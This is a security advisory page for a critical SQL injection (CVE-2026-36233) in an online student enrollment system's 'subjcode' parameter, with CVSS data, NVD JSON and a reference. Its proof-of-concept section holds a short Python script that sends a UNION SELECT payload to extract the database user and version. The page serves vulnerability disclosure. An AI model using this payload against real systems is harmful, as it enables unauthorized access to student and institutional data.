Security Vulnerability Report
中文
CVE-2026-36233 CVSS 9.8 CRITICAL

CVE-2026-36233

Published: 2026-04-10 15:16:25
Last Modified: 2026-04-14 17:40:19
Source: [email protected]

Description

A SQL injection vulnerability was found in the assignInstructorSubjects.php file of itsourcecode Online Student Enrollment System v1.0. The reason for this issue is that attackers can inject malicious code via the parameter "subjcode" and use it directly in SQL queries without the need for appropriate cleaning or validation.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode Online Student Enrollment System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Replace with actual target) target_url = "http://target.com/assignInstructorSubjects.php" # Payload to test SQL Injection (Extracting database version) # Assuming the parameter is passed via POST payload_data = { "subjcode": "' UNION SELECT 1, user(), version(), 4-- -" } try: # Send POST request with malicious payload response = requests.post(target_url, data=payload_data) # Check if the response contains database information if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response snippet:") print(response.text[:500]) # Print first 500 chars for analysis else: print("[-] Target might be down or blocking requests.") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36233", "sourceIdentifier": "[email protected]", "published": "2026-04-10T15:16:24.820", "lastModified": "2026-04-14T17:40:18.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability was found in the assignInstructorSubjects.php file of itsourcecode Online Student Enrollment System v1.0. The reason for this issue is that attackers can inject malicious code via the parameter \"subjcode\" and use it directly in SQL queries without the need for appropriate cleaning or validation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95"}]}]}], "references": [{"url": "https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_assignInstructorSubjects.php_sql_injection.pdf", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.